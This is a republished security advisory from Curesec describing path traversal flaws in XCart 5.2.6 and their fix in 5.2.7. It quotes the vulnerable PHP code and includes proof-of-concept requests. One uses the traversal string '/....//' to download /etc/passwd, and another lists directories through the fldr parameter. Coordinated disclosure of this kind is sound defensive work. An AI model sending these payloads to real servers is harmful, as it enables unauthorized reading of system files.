XCart 5.2.6 Path Traversal

2015-11-16T00:00:00
ID PACKETSTORM:134344
Type packetstorm
Reporter Tim Coen
Modified 2015-11-16T00:00:00

Description

                                        
                                            `Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: XCart 5.2.6  
Fixed in: 5.2.7  
Fixed Version Link: https://www.x-cart.com/xc5kit  
Vendor Contact: support@x-cart.com  
Vulnerability Type: Path Traversal  
Remote Exploitable: Yes  
Reported to vendor: 08/13/2015  
Disclosed to public: 11/04/2015  
Release mode: Coordinated release  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Arbitrary File Download  
  
Description  
  
When downloading a file, the input is not properly protected against directory  
traversal, which makes it possible to download arbitrary files.  
  
Please note that admin credentials are required.  
  
Proof of Concept  
  
  
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php  
POST: path=/....//....//....//....//....//....//....//....//..etc/passwd&name=download.txt  
  
Code  
  
  
/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php:10  
$path=joinPaths($root,$upload_dir,$_POST['path']);  
$path=str_replace(LC_DS . '..', '', $path);  
$name=$_POST['name'];  
  
header('Pragma: private');  
header('Cache-control: private, must-revalidate');  
header("Content-Type: application/octet-stream");  
header("Content-Length: " .(string)(filesize($path)) );  
header('Content-Disposition: attachment; filename="'.($name).'"');  
readfile($path);  
  
3. List Directories  
  
Description  
  
It is possible to list the directories contained by any directory due to a  
directory traversal vulnerability via the fldr POST argument. This may be used  
to gather information about the target system.  
  
Please note that admin credentials are required.  
  
Proof of Concept  
  
  
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?type=0&editor=mce_0&popup=0&lang=en_EN&field_id=&fldr=../../../../../../  
  
4. Solution  
  
To mitigate this issue please upgrade at least to version 5.2.7:  
  
https://www.x-cart.com/xc5kit  
  
Please note that a newer version might already be available.  
  
5. Report Timeline  
  
08/13/2015 Informed Vendor about Issue  
09/03/2015 Vendor Requests more time  
10/19/2015 Vendor releases fix  
11/04/2015 Disclosed to public  
  
  
Blog Reference:  
http://blog.curesec.com/article/blog/XCart-526-Path-Traversal-85.html  
  
  
`